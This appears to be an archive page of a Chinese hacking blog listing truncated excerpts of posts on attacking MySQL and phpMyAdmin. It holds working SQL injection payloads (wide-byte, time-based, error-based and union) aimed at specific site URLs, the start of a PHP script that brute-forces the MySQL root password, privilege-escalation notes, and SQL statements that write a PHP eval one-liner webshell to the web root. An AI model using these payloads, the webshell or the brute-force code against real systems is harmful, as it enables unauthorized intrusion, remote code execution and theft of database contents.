phpmyadmin新姿势getshell

分类:安全 | 2017-03-15 | 撸过 3,805 次
6人扯谈

旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell?
首先环境如下:

  • OS:Windows 2003
  • WAF:Safe Dog 4.0正式版
  • phpmyadmin:4.7(许多都可以)
  • Mysql:5.5+
  • PHP:5.3
  • Apache:2.x

目前

into outfile

已经被禁用,并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。

(必须是mysql root权限)

登录phpmyadmin后,查看全局变量:
找到

general[......]

继续阅读

MYSQL提权总结

分类:安全 | 2016-07-16 | 撸过 1,994 次
0人扯谈

最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。
一、利用mof提权

前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:
Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式[......]

继续阅读

免密码hash登陆mysql

分类:工具 | 2016-06-28 | 撸过 1,830 次
1人扯谈

在获取到mysql用户的hash后,
可用hash直接登陆mysql进行操作
比如我们注入出数据库的hash,但是没办法拿到webshell
我们可以使用mysql_hash,用hash登陆并控制数据库
使用方法:

mysql_hash.exe -u root -p < 1.txt

Enter password: *****************************************
其中1.txt在同目录,内容为你想执行的sql语句,
比如:show databases;

[......]

继续阅读

Mysql 注入判断的一点思路

分类:安全 | 2012-02-23 | 撸过 495 次
1人扯谈

有时候我们注入的时候很难用and 1=1和 and 1=2来判断是否存在注入。。特别是像宽字节注入这种。。就比如说搜索型注入吧。。当存在宽字节注入时我们加上了%d5这样的。。数据库是查不到的。

这是我们就可以用延迟注入来判断 (当然or语句应该也是可以的,只是一点思路)

比如:

word=%d5%27 and 1=1%23
word=%d5%27 and 1=2%23

是判断不出是否存在注入的,因为都没查询到,这时我们可以构造:

word=%d5%27 and id=benchmark(1800000,md5(144111))%23

因为id这个字段一般都是存在的,将144111[......]

继续阅读

php+mysql高级爆错注入经测算有效

分类:安全 | 2012-02-19 | 撸过 1,320 次
1人扯谈

之前想找个测试 没想到这有 可以测试下做个记录而已

https://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003[......]

继续阅读

PHP Mysql 密码暴力破解,root密码破解 源码

分类:工具 | 2012-01-25 | 撸过 948 次
5人扯谈
<?
set_time_limit(0);                                   //脚本不超时

$ip = "localhost";                                   //IP
$user = "root";                                      //用户名
$passwd = file("password.txt");                      //密码字典

for($i=0; $i<count($passwd); $i++){
    $pass = Str[......]

继续阅读

mysql注入初体验 Root权限下注入及普通用户利用系统表的注入

分类:安全 | 2011-12-2 | 撸过 785 次
0人扯谈

测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://webshell.cc/show.php?id=2
菜菜我第一次写文章……
一. Root权限下的mysql注入

直接在网址后面添加引号https://www.webshell.cc/show.php?id=2'

直接爆出为Mysql数据库,使用xor 1=1 xor 1=2确定为整数型注入;

确定mysql版本号,提交https://webshell.cc/show.php?id=2 and ord(mid(version(),1,1))>51,返回正确,版本大于5[......]

继续阅读

win+php+mysql 注入实战篇

分类:安全 | 2011-11-18 | 撸过 450 次
0人扯谈

http://www.webshell.cc/answer_view.php?id=10291' //有注入
//常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4,8,2

//上火狐,报表.

https://www.webshell.cc/answer_view.php?id=10291%20[......]

继续阅读

MySQL导出一句话拿WebShell的方法

分类:安全 | 2011-11-9 | 撸过 2,759 次
0人扯谈

文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):

Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表
Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话[......]

继续阅读

MySQL Root密码另类破解

分类:安全 | 2011-10-22 | 撸过 382 次
0人扯谈

当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时:

停止mysql服务

将下载的user.MYD user.frm user.MYI替换本地文件,

然后 cd mysql\bin mysqld-nt --skip-grant-tables

重新打开一个cmd mysql -u root select user,password from mysql.user;

自己记录下,免得忘记命令

第 1 页,共 3 页123